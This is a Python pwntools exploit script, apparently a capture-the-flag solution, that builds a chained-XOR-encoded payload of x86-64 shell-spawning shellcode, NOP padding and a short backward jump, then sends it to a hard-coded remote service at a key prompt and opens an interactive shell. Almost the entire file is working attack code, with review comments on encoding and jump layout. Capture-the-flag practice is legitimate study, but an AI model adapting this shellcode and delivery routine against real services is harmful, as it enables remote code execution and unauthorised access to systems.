from pwn import *
import sys
import time


def create_exploit_string(s):
    """Encode *s* with a right-to-left running XOR.

    The last character of *s* is kept unchanged. Every earlier character is
    XORed with the already-encoded character to its right. The result has the
    same length as *s*; an empty input yields an empty string.

    NOTE(review): presumably the receiving program applies the inverse
    chained-XOR transform to its input, so the payload arrives decoded.
    That program is not shown here; confirm against it.
    """
    encoded = []
    previous = None
    # Walk from the end of the input, carrying the last encoded character.
    for ch in reversed(s):
        if previous is not None:
            ch = chr(ord(ch) ^ ord(previous))
        encoded.append(ch)
        previous = ch
    # The list was built back-to-front, so flip it into input order.
    encoded.reverse()
    return ''.join(encoded)


# Shellcode from http://shell-storm.org/shellcode/files/shellcode-806.php
# NOTE(review): the literals below are plain (non-bytes) strings with \x
# escapes, which looks like Python 2 style byte handling. Confirm how
# pwntools encodes them before running under Python 3.
SHELLCODE = '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'

# Fill with 0x90 bytes so that shellcode plus padding is exactly 0x27 bytes.
PAD_LENGTH = 0x27 - len(SHELLCODE)
PADDING = '\x90'*PAD_LENGTH

# Two trailing bytes appended after the padded shellcode.
# NOTE(review): 0xeb is the x86 short-jump opcode, so this looks like a
# backward jump into the preceding bytes. Confirm against the target layout.
JUMP = '\xeb\xdd'

exploit_string = create_exploit_string(SHELLCODE + PADDING + JUMP)

# Remote endpoint is hard-coded; the connection is opened as soon as the
# script runs.
HOST = 'arcade.fluxfingers.net'
PORT = 1807

p = remote(HOST, PORT)

# Menu interaction: send 'bc', discard buffered output, pick option '3',
# then wait for the key prompt before sending the encoded payload.
p.sendline('bc')
p.clean()
p.sendline('3')
p.recvuntil('Enter the Key to win: ')
p.sendline(exploit_string)

# Hand the session to the operator, then close the connection on exit.
p.interactive()
p.close()